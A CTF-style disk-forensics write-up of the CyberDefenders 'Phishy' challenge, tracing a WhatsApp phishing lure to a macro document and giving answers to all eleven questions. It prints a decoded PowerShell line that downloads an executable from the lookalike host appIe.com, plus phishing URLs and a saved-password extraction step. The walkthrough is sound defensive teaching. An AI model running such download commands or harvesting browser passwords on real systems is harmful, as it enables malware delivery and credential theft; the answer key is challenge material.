I hope to find you well.
This is Ali Alaa and this is Phishy writeup for CyberDefenders platform’s challenge.
This is a Disk Forensics challenge and if you wanna find more about this topic you can try Phishy challenge.
So, lets start….
First Question: What is the hostname of the victim machine?
First thing first I must load image at FTK imager to access data.
Here we go I begun explore data and first clue came in my mind to see registry hives so, lets export SYSTEM hive I found it under this directory “C:\Windows\System32\config” and other hives.
Then I loaded this hive in Registry Explorer.
Here we go, the answer is : WIN-NF3JQEU4G0T
Second Question: What is the messaging app installed on the victim machine?
Download folder is a good place to see to know what previous apps were downloaded to install and also program files & (x86) where installed so, I navigated firstly to download folder and I found this app
This clue confirmed that he used Whatsapp to communicated.
Another clue here “\Users\Semah\AppData\Local\WhatsApp\”
Here we go, the answer is :Whatsapp
Third Question: The attacker tricked the victim into downloading a malicious document. Provide the full download URL.
Here I must see where data related to Whatsapp stored form our perspective as DFIR these data can be artifacts we can use to solve case.
So, I navigated to “C:\Users\Semah\AppData\Roaming\WhatsApp” where data stored
Then I found “Databases” folder hold all artifacts I needed but most important one is “msgstore.db” that hold chat messages. I exported these files then use “WhatsAppViewer” to access this db file.
So, I found attacker send to victim a tricky link to doc that hold all winners.
Here we go, the answer is : http://appIe.com/IPhone-Winners.doc
Forth Question: Multiple streams contain macros in the document. Provide the number of the highest stream.
Form previous question I got the link “http://appIe.com/IPhone-Winners.doc” this means that file downloaded and first place came in mind is “Downloads” folder.
I tried to open it but unfortunately I can’t 😢
I got form question itself a word I didn’t face before so, I’ll learn
new topic lets google it ….
After I got needed knowledge I knew what I had to do..
I used “OLEdump” to dump linked or embedded objects form file.
Streams contain marcos are indicated with uppercase “M” so, 9 and 10 are streams needed. After I compared 2 streams I found 10 is highest with 5581.
Here we go, the answer is : 10
Fifth Question: The macro executed a program. Provide the program name?
Here I tried to see content of these 2 streams so, l tried to analysis stream 9 first
Here I found “Document_open()” that mean this if calling another function so, lets try analysis “stream 10” ..
Function obfuscated and I must to deobfuscate code
It seams it’s a “Powershell ”command.
Here we go, the answer is : Powershell
Sixth Question: The macro downloaded a malicious file. Provide the full download URL.
I got a poweshell encoded command so, let’s read it with EncodedCommad in powershell and output content in text file called “poc.txt”.
Here is a clue of evidence
Here we go, the answer is : http://appIe.com/Iphone.exe
Seventh Question: Where was the malicious file downloaded to? (Provide the full path)
As I read powershell with EncodedCommad I go content in “poc.txt” with this command
“invoke-webrequest -Uri ‘http://appIe.com/Iphone.exe' -OutFile ‘C:\Temp\IPhone.exe’ -UseDefault Credentials”
So, attaker after downloaded exe he sent output to C:\Temp\IPhone.exe
Here we go, the answer is : C:\Temp\IPhone.exe
Eighth Question: What is the name of the framework used to create the malware?
Here I did static analysis for “IPhone.exe” with virustotal and searched in all security vendors’ analysis
Here I found “Trojan.Meterpreter” is a Metasploit attack payload.
Here we go, the answer is : Metasploit
Ninth Question: What is the attacker’s IP address?
I found it in “Network Related” in hybrid analysis.
Here we go, the answer is : 18.104.22.168
Tenth Questions: The fake giveaway used a login page to collect user information. Provide the full URL of the login page?
I got he used Mozila firefox browser so, I navigated to profile and extracted needed artifact “places.sqlite” that holds all visited urls.
Here we go, the answer is : http://appIe.competitions.com/login.php
Eleventh Question: What is the password the user submitted to the login page?
I used “passwordfox” to extract password from profile. I selected profile then pyb51x2n.default-release that holds all artifacts.
*Passwordfox automated tool to extract passwords from Mozila firefox.
Here we go, the answer is : GacsriicUZMY4xiAF4yl
At the end ,
I hope you enjoyed this writeup ❤️.